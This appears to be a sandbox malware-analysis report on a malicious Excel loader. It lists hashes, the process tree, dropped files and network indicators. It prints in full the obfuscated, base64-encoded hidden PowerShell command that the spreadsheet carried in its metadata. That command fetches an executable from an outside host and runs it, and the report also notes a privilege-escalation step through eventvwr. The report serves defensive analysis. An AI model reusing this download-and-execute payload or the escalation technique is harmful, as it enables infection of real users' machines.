analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | e7c343c1fbce0cdf82d4f72b136e611e15be29e4dbdca72a705499c9f154ae27.xls |
| Full analysis: | https://app.any.run/tasks/8866aa07-ecb6-4ea4-a031-4ec08d79ce42 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | March 15, 2019, 02:56:08 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.ms-excel |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: HP, Last Saved By: HP, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Mar 14 09:19:55 2019, Last Saved Time/Date: Thu Mar 14 09:24:42 2019, Security: 0 |
| MD5: | 557D63D6D5FB3B492B0B19A18072A9F0 |
| SHA1: | 6AB2FA3C439ABF24E0F957185BF6785CF7CBD7E9 |
| SHA256: | E7C343C1FBCE0CDF82D4F72B136E611E15BE29E4DBDCA72A705499C9F154AE27 |
| SSDEEP: | 768:VenxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAK85/Lf1S5d9kXrycvxpZlpmvJn36:wnxEtjPOtioVjDGUU1qfDlaGGx+cL2QE |
MALICIOUS
Application was dropped or rewritten from another process
- 3456redff.exe (PID: 3228)
- 3456redff.exe (PID: 3652)
- 3456redff.exe (PID: 3740)
- 3456redff.exe (PID: 2756)
- Moe1.exe (PID: 3256)
Unusual execution from Microsoft Office
- EXCEL.EXE (PID: 2836)
Downloads executable files from the Internet
- POwErsHelL.eXE (PID: 3084)
Executes PowerShell scripts
- EXCEL.EXE (PID: 2836)
Known privilege escalation attack
- 3456redff.exe (PID: 3228)
- 3456redff.exe (PID: 3740)
Changes the autorun value in the registry
- 3456redff.exe (PID: 3740)
SUSPICIOUS
Executable content was dropped or overwritten
- POwErsHelL.eXE (PID: 3084)
- 3456redff.exe (PID: 3740)
Application launched itself
- 3456redff.exe (PID: 3652)
- 3456redff.exe (PID: 2756)
Creates files in the user directory
- POwErsHelL.eXE (PID: 3084)
- 3456redff.exe (PID: 3740)
Modifies the open verb of a shell class
- 3456redff.exe (PID: 3228)
- 3456redff.exe (PID: 3740)
Executes scripts
- 3456redff.exe (PID: 3740)
Starts CMD.EXE for commands execution
- WScript.exe (PID: 3064)
INFO
Reads Microsoft Office registry keys
- EXCEL.EXE (PID: 2836)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .xls | | | Microsoft Excel sheet (48) |
|---|---|---|
| .xls | | | Microsoft Excel sheet (alternate) (39.2) |
EXIF
FlashPix
| CompObjUserType: | Microsoft Excel 2003 Worksheet |
|---|---|
| CompObjUserTypeLen: | 31 |
| HeadingPairs: |
|
| TitleOfParts: | Sheet1 |
| HyperlinksChanged: | No |
| SharedDoc: | No |
| LinksUpToDate: | No |
| ScaleCrop: | No |
| AppVersion: | 14 |
| Company: | POwErsHelL.eXE -ex BYPAss -nOP -W hiDden -ec IAAgAAkAKAAJAAkAIAAmACgAJwBuAGUAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACcAVwAtAG8AQgBqACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAEUAQwAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJwBUACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkAIAAJACAATgBlAFQALgBXAGUAYgBDAGwAaQBlAE4AVAAgACAAIAApAC4AZABPAFcATgBMAG8AQQBkAEYAaQBMAGUAKAAgACAAIAAdIA0ACgBoAHQAdABwADoALwAvAHcAdwB3AC4AaABhAGsAZQByAG0AYQBuAC4AZABlAC8ASwBlAHkALwBNAG8AZQBzAC4AZQB4AGUAHSAJACAACQAsACAACQAJAB0gJABlAE4AdgA6AGEAUABwAGQAYQB0AEEAXAAzADQANQA2AHIAZQBkAGYAZgAuAGUAeABlAB0gIAAJACAAKQAJACAAIAA7AAkAIAAJAHMAQQBQAFMAIAAgACAAHSAkAGUAbgBWADoAYQBwAHAAZABBAHQAYQBcADMANAA1ADYAcgBlAGQAZgBmAC4AZQB4AGUAHSA= |
| CodePage: | Windows Latin 1 (Western European) |
| Security: | None |
| ModifyDate: | 2019:03:14 09:24:42 |
| CreateDate: | 2019:03:14 09:19:55 |
| Software: | Microsoft Excel |
| LastModifiedBy: | HP |
| Author: | HP |
Total processes
46
Monitored processes
11
Malicious processes
7
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2836 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
| 3084 | POwErsHelL.eXE -ex BYPAss -nOP -W hiDden -ec IAAgAAkAKAAJAAkAIAAmACgAJwBuAGUAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACcAVwAtAG8AQgBqACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAEUAQwAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJwBUACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkAIAAJACAATgBlAFQALgBXAGUAYgBDAGwAaQBlAE4AVAAgACAAIAApAC4AZABPAFcATgBMAG8AQQBkAEYAaQBMAGUAKAAgACAAIAAdIA0ACgBoAHQAdABwADoALwAvAHcAdwB3AC4AaABhAGsAZQByAG0AYQBuAC4AZABlAC8ASwBlAHkALwBNAG8AZQBzAC4AZQB4AGUAHSAJACAACQAsACAACQAJAB0gJABlAE4AdgA6AGEAUABwAGQAYQB0AEEAXAAzADQANQA2AHIAZQBkAGYAZgAuAGUAeABlAB0gIAAJACAAKQAJACAAIAA7AAkAIAAJAHMAQQBQAFMAIAAgACAAHSAkAGUAbgBWADoAYQBwAHAAZABBAHQAYQBcADMANAA1ADYAcgBlAGQAZgBmAC4AZQB4AGUAHSA= | C:\Windows\System32\WindowsPowerShell\v1.0\POwErsHelL.eXE | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 3652 | "C:\Users\admin\AppData\Roaming\3456redff.exe" | C:\Users\admin\AppData\Roaming\3456redff.exe | — | POwErsHelL.eXE |
User: admin Company: Integrity Level: MEDIUM Exit code: 0 Version: 8.00.0006 | ||||
| 3228 | "C:\Users\admin\AppData\Roaming\3456redff.exe" | C:\Users\admin\AppData\Roaming\3456redff.exe | — | 3456redff.exe |
User: admin Company: Integrity Level: MEDIUM Exit code: 0 Version: 8.00.0006 | ||||
| 3092 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | — | 3456redff.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Event Viewer Snapin Launcher Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 3916 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | 3456redff.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Event Viewer Snapin Launcher Exit code: 3221225547 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 2756 | "C:\Users\admin\AppData\Roaming\3456redff.exe" | C:\Users\admin\AppData\Roaming\3456redff.exe | — | eventvwr.exe |
User: admin Company: Integrity Level: HIGH Exit code: 0 Version: 8.00.0006 | ||||
| 3740 | "C:\Users\admin\AppData\Roaming\3456redff.exe" | C:\Users\admin\AppData\Roaming\3456redff.exe | 3456redff.exe | |
User: admin Company: Integrity Level: HIGH Exit code: 0 Version: 8.00.0006 | ||||
| 3064 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\install.vbs" | C:\Windows\System32\WScript.exe | — | 3456redff.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
| 2344 | "C:\Windows\System32\cmd.exe" /c "C:\Users\admin\AppData\Roaming\Moe1\Moe1.exe" | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
Total events
1 338
Read events
1 218
Write events
0
Delete events
0
Modification events
Executable files
2
Suspicious files
5
Text files
5
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2836 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRDE99.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3084 | POwErsHelL.eXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\45UC2N2F15TTXZEPGAS4.temp | — | |
MD5:— | SHA256:— | |||
| 3228 | 3456redff.exe | C:\Users\admin\AppData\Local\Temp\~DFDA5B02F143622BEF.TMP | — | |
MD5:— | SHA256:— | |||
| 3740 | 3456redff.exe | C:\Users\admin\AppData\Local\Temp\~DFA4B0B831E8646CF4.TMP | — | |
MD5:— | SHA256:— | |||
| 3652 | 3456redff.exe | C:\Users\admin\AppData\Local\Temp\~DF668E87D8680ACEF4.TMP | binary | |
MD5:17730137304416714A5DAEBC8B1D8DB1 | SHA256:3A34FB90395F1C34A49B3F4CBDEDA64010AD269D012BC56E149C4FBC920297C0 | |||
| 3740 | 3456redff.exe | C:\Users\admin\AppData\Local\Temp\install.vbs | binary | |
MD5:5BFDA3A505E3EAD218E3C35A81EE9B41 | SHA256:CB4823A87658BC04F0C5D85A5D77A586CC5A12B5192C02AAC933FB1FE52ABB80 | |||
| 3084 | POwErsHelL.eXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0586DB8FF5249AD980CEC7BF2CBC3708 | SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2 | |||
| 3084 | POwErsHelL.eXE | C:\Users\admin\AppData\Roaming\3456redff.exe | executable | |
MD5:01AE7C94C8C923A29C22A2FD4EDB5601 | SHA256:2E2944BBCF94BC44EF10C3029DF5AFBD1195872198AAAD0CDA3BAC638F953BEE | |||
| 3740 | 3456redff.exe | C:\Users\admin\AppData\Roaming\Moe1\Moe1.exe | executable | |
MD5:01AE7C94C8C923A29C22A2FD4EDB5601 | SHA256:2E2944BBCF94BC44EF10C3029DF5AFBD1195872198AAAD0CDA3BAC638F953BEE | |||
| 2756 | 3456redff.exe | C:\Users\admin\AppData\Local\Temp\~DF0A15011D9DC2479A.TMP | binary | |
MD5:17730137304416714A5DAEBC8B1D8DB1 | SHA256:3A34FB90395F1C34A49B3F4CBDEDA64010AD269D012BC56E149C4FBC920297C0 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3084 | POwErsHelL.eXE | GET | 200 | 31.192.213.123:80 | http://www.hakerman.de/Key/Moes.exe | TR | executable | 508 Kb | suspicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3084 | POwErsHelL.eXE | 31.192.213.123:80 | www.hakerman.de | Netinternet Bilisim Teknolojileri AS | TR | suspicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.hakerman.de |
| suspicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
3084 | POwErsHelL.eXE | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
3084 | POwErsHelL.eXE | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3084 | POwErsHelL.eXE | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |